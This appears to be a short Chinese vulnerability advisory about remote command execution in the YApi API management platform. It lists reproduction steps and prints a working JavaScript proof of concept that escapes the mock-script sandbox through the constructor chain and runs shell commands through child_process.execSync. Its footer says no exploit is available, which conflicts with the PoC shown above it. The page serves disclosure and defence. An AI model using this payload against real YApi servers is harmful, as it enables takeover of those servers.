Yapi 远程命令执行漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

## 如何复现此问题 登录注册后,创建一个项目 ![](https://images.seebug.org/1625813961418-w331s) 然后选择设置全局的mock脚本,设置命令为远程访问我的服务器地址。 ![](https://images.seebug.org/1625813980618-w331s) 随后添加接口,访问接口的mock地址 ![](https://images.seebug.org/1625813988960-w331s) 服务器可看到响应如下,远程服务器接受到请求 ![](https://images.seebug.org/1625813996732-w331s) poc: ``` const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockjson = process.mainModule.require("child_process").execSync("command").toString() ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息